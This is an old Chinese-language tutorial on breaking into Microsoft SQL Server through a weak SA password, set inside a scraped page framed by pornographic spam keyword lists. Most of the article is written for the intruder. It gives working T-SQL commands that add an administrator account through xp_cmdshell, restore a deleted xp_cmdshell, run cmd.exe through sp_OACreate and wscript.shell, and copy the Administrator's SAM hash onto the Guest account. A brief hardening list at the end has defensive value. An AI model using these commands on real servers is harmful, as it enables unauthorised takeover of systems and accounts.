国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

Microsoft SQL Server SA弱口令攻防實戰
2007-10-17   

Microsoft SQLServer是一個c/s模式的強大的關系型數據庫管理系統,應用領域十分廣泛,從網站后臺數據庫到一些MIS(管理信息系統)到處都可以看到它的身影。我們都知道,在網絡中Microsoft SQLServer的入侵最常見的就是利用SA弱口令入侵了,而核心內容就是利用Microsoft SQLServer中的存儲過程獲得系統管理員權限,那到底什么是存儲過程?為什么利用它可以獲得系統管理員權限?

存儲過程是存儲在SQLServer中的預先寫好的SQL語句集合,它分為三類:系統提供的存儲過程,用戶定義的存儲過程和擴展存儲過程。
系統提供的存儲過程是在安裝SQLServer時創建的存儲過程,名字以"sp_"開頭。
用戶定義的存儲過程是用SQLServer的使用者編寫的存儲過程。
擴展存儲過程則是對動態鏈接庫(DLL)函數的調用,主要是用于客戶端與服務器端或客戶端之間進行通信的,與一般動態鏈接庫不同的是它們直接運行在SQLServer分配的內存地址內,其中危險性最高的擴展存儲過程就是xp_cmdshell了,它可以執行操作系統的任何指令。

SA是Microsoft SQLServer的管理員帳號,擁有最高權限,它可以執行擴展存儲過程,并獲得返回值,比如執行:

exec master..xp_cmdshell 'net user test 12345 /add'和exec master..xp_cmd
shell 'net localgroup administrators test /add'

這樣對方的系統就被添加了一個用戶名為test,密碼為12345,有管理員權限的用戶,現在你應該明白為什么得到SA密碼,就可以得到系統的最高權限了吧。下面就詳細的講一下Microsoft SQLServer中利用SA弱口令的攻擊與防范。

通常當我們掃描到一臺有Microsoft SQLServer SA弱口令的機器,都會用一些專門的攻擊工具,比如SqlExec,如圖x.1所示,SuperSQLEXEC,如圖x.2所示,以及SQL綜合利用工具,如圖x.3所示。

圖x.1  SqlExec運行界面

圖x.2  SuperSQLEXEC運行界面
 
 
圖x.3  SQL綜合利用工具


這三款軟件相對來講SQL綜合利用工具的功能更強些,因為它可以利用漏洞上傳文件,這樣我們就可以上傳木馬程序,然后執行。

可是在實際操作中,情況并不象我們的那樣簡單,我們上傳木馬程序后,一般都會被對方的殺毒軟件殺掉。而且經過使用SQL事件探查器(可以通過安裝Microsoft SQLServer獲得)對SQL綜合利用工具提交的SQL語句抓取發現,要使SQL綜合利用工具上傳功能成功完成,有個前提條件就是對方Microsoft SQLServer中的存儲過程xp_cmdshell沒有被刪除,如圖x.4所示,否則無法成功執行,也就是說就算我們的木馬可以不被查殺,無法執行上傳功能也是沒有用的。

圖x.4  SQL事件探查器抓取的
SQL綜合利用工具提交的SQL語句


刪除xp_cmdshell的語句為:exec sp_dropextendedproc 'xp_cmdshell',同樣我們也可以使用Microsoft SQLServer中的查詢分析器連接到對方的Microsoft SQLServer,來恢復xp_cmdshell,語句為:exec sp_addextendedproc 'xp_cmdshell', 'Xplog70.dll',如圖x.5所示。恢復后,我們就可以使用SQL綜合利用工具的上傳功能了,并可以執行上傳的文件。

圖x.5  查詢分析器的界面

但如果對方把Microsoft SQLServer中的xplog70.dll文件刪除或放到其他地方了, xp_cmdshell就無法執行我們發出的命令了。

難道就沒有其他辦法了?當然不是,在Microsoft SQLServer中有一系列與OLE相關的存儲過程,這一系列的存儲過程同Xp_cmdshell以及讀取注冊表系列的存儲過程一樣危險,但是其使用方法不象那些存儲過程在網絡上和書上介紹的那樣多,所以被刪除的可能性就小一些。這系列的存儲過程有sp_OACreate,sp_OADestroy,sp_OAGetErrorInfo,sp_OAGetProperty,sp_OAMethod,sp_OASetProperty,sp_OAStop。

使用查詢分析器連接到對方的Microsoft SQLServer,在查詢分析器中執行:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC 
SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net user test 
12345 /add'--

再執行:DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT 
EXEC SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net 
localgroup administrators test /add '--


就可以在對方的系統添加一個用戶名為test,密碼為12345,有管理員權限的用戶。

如果對方把Xp_cmdshell、SP_OACREATE等可執行系統命令的存儲過程,以及與它們相對應的動態連接庫文件刪除了,我們還有一個辦法,就是使用可以讀取和修改注冊表的存儲過程來克隆對方系統的管理員用戶。在查詢分析器里運行下面的語句:

xp_regread 'HKEY_LOCAL_MACHINE','SAM\SAM\Domains\Account\Users\000001F4','F',

可以得到對方系統administrator的加密密碼,然后復制,如圖x.6所示。

圖x.6  使用xp_regread得到加密密碼


然后再執行:

xp_regwrite 'HKEY_LOCAL_MACHINE','SAM\SAM\Domains\Account\Users\000001F5
','F','reg_binary',0x(上面復制的那串字符),

如果對方有遠程終端服務,那我們就可以用Guest用戶登陸,密碼為空,而且Guest的桌面與administrator的完全一樣。

有很多種方法得到Microsoft SQLServer SA的密碼,比如通過Sniffer到SA的加密密碼,然后通過密碼對照表(網上可以找到),得到SA的明文密碼,再比如通過SQL注入得到SA密碼或者使用sp_password(修改數據庫用戶密碼的存儲過程)修改得到SA密碼,還有可以掛密碼字典進行暴力破解。一旦被SA密碼被入侵者得到,會對服務器的安全帶來很大隱患,所以我們整理了一個解決方案提供給大家:

1.在確定不需要的情況下,刪除xp_cmdshell,xp_dirtree,xp_regread,xp_regdeletekey,xp_regdeletevalue,xp_regwrite,sp_oacreate,sp_oadestroy,sp_oagetErrorInfo,sp_oagetProperty,sp_oamethod,sp_oasetProperty,sp_oastop這些存儲過程,移走相關的動態連接庫文件,在需要的時候復制到原來的位置就可以了。
2.應用程序和網站在與后臺的Microsoft SQLServer數據庫連接時不要用SA等高權限的用戶連接。
3.給SA等高權限的用戶起一個健壯的密碼。


熱詞搜索:

上一篇:賽門鐵克發布2007年10月垃圾郵件現狀報告
下一篇:SQL Server SA空口令的滲透測試日記

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产日韩欧美| 亚洲激情一区二区| 国产欧美一区二区三区在线老狼 | 亚洲欧美日韩一区二区在线| 欧美成人午夜免费视在线看片| 极品少妇一区二区三区精品视频| 亚洲手机在线| 国产精品免费观看视频| 亚洲免费视频观看| 国产一区二区av| 美女图片一区二区| 亚洲视频一区在线观看| 国产免费观看久久黄| 久久久久欧美精品| 99综合电影在线视频| 国产一区二区精品丝袜| 久久精品中文| 亚洲国内自拍| 国内精品久久久久伊人av| 欧美成人情趣视频| 亚洲高清一区二| 欧美麻豆久久久久久中文| 国产精品99久久不卡二区| 亚洲电影免费在线观看| 国产精品网站在线播放| 欧美日韩三级| 欧美午夜国产| 欧美午夜a级限制福利片| 老司机午夜免费精品视频 | 国产精品久久久久久久第一福利 | 国产视频久久久久| 欧美小视频在线| 欧美激情1区2区| 麻豆精品视频在线| 香蕉久久一区二区不卡无毒影院| 亚洲国产va精品久久久不卡综合| 国产主播一区| 在线免费观看日韩欧美| 又紧又大又爽精品一区二区| 国产精品成人播放| 国产精品久久久久久久久婷婷| 欧美华人在线视频| 欧美国产日韩一区| 美女精品国产| 免费永久网站黄欧美| 女人色偷偷aa久久天堂| 欧美另类极品videosbest最新版本 | 欧美日韩黄色大片| 欧美日韩国产限制| 欧美色图一区二区三区| 国产欧美亚洲一区| ●精品国产综合乱码久久久久| 日韩亚洲欧美中文三级| 午夜在线精品偷拍| 欧美成人一区在线| 国产精品亚洲视频| 亚洲国产导航| 久久精品道一区二区三区| 美女亚洲精品| 激情欧美丁香| 欧美成年人网| 欧美国产日韩一区二区在线观看| 欧美精品播放| 国内精品久久久久影院薰衣草| 亚洲七七久久综合桃花剧情介绍| 一区二区日韩伦理片| 欧美不卡一卡二卡免费版| 国产精品色在线| 国产精品99久久不卡二区 | 久久疯狂做爰流白浆xx| 欧美午夜电影在线| 亚洲黄色av一区| 免费亚洲一区二区| 亚洲国产成人av在线| 久久精品人人做人人综合| 国产精品视频网址| 亚洲欧美国产一区二区三区| 欧美体内谢she精2性欧美| 亚洲精品乱码久久久久久按摩观| 久久综合中文| 亚洲精品免费一二三区| 欧美美女喷水视频| 亚洲一区视频在线| 国产区日韩欧美| 久久在线免费| 一本一本大道香蕉久在线精品| 欧美刺激午夜性久久久久久久| 在线免费观看视频一区| 欧美日韩亚洲免费| 久久精品国产免费看久久精品| 国产视频一区在线观看一区免费| 久久黄色影院| 夜夜嗨av一区二区三区四季av | 一本大道久久a久久精二百| 欧美激情一区| 久久久久久久91| 亚洲一二三区在线观看| 1000精品久久久久久久久| 欧美午夜精品伦理| 免费久久99精品国产自| 欧美一区2区三区4区公司二百| 亚洲激情av| 亚洲激情在线| 在线成人h网| 国内成+人亚洲| 国产精品综合色区在线观看| 欧美另类在线观看| 欧美三级视频在线播放| 欧美极品aⅴ影院| 美女视频黄 久久| 老司机免费视频久久| 久久久国产精品亚洲一区| 欧美一区免费视频| 久久九九精品99国产精品| 欧美一区永久视频免费观看| 亚洲一区二区三区四区在线观看| 亚洲国产精品激情在线观看| 伊人精品视频| 99视频精品| 久久大逼视频| 蜜桃av一区二区| 欧美人交a欧美精品| 欧美日韩国产专区| 国产精品亚洲成人| 曰本成人黄色| 亚洲精品一区二区三区在线观看| 亚洲精品字幕| 亚洲欧美日韩国产中文在线| 亚洲欧美一区二区原创| 欧美在线视频一区二区| 久久偷看各类wc女厕嘘嘘偷窃| 欧美精品一区二区三区蜜桃 | 久久婷婷色综合| 国产精品porn| 91久久久久久久久| 午夜精品久久久久久久白皮肤| 久久字幕精品一区| 国产乱码精品一区二区三区忘忧草| 精品1区2区3区4区| 亚洲综合色婷婷| 欧美区一区二| 亚洲少妇一区| 欧美人与禽性xxxxx杂性| 亚洲风情在线资源站| 久久精品亚洲精品| 国产日韩欧美中文| 欧美一区二区三区视频| 久久一区二区三区国产精品| 国产一区日韩欧美| 久久精品视频亚洲| 国产综合第一页| 久久理论片午夜琪琪电影网| 国产精品视屏| 久久99在线观看| 在线视频欧美日韩| 老鸭窝毛片一区二区三区| 在线播放精品| 欧美日韩亚洲网| 欧美一区二区三区喷汁尤物| 国产亚洲人成a一在线v站| 久久久久成人精品免费播放动漫| 国内精品久久久久久| 老司机一区二区三区| 亚洲毛片在线免费观看| 国产精品美女黄网| 久久九九精品| 日韩视频在线观看免费| 国产精品视频久久| 久久久久欧美| 这里只有精品丝袜| 亚洲国产欧洲综合997久久| 欧美老女人xx| 国产一区二区三区久久久| 国产偷久久久精品专区| 久久大香伊蕉在人线观看热2| 极品少妇一区二区三区精品视频| 欧美韩日一区二区三区| 亚欧美中日韩视频| 一区二区三区欧美在线观看| 国产一区二区三区在线观看精品 | 欧美日韩免费一区二区三区视频| 在线午夜精品| 91久久线看在观草草青青| 国产精品热久久久久夜色精品三区| 久久国产天堂福利天堂| 亚洲第一精品电影| 国产精品久久久久久久久婷婷| 久久久久久久性| 欧美一级二级三级蜜桃| 一本色道久久综合精品竹菊| 亚洲第一精品夜夜躁人人躁 | 亚洲欧美日韩视频二区| 欧美日韩国产美| 亚洲色图制服丝袜| 亚洲美女精品久久| 亚洲人成在线观看网站高清| 国产九色精品成人porny| 欧美日韩在线精品一区二区三区| 免费国产一区二区| 欧美日韩综合在线|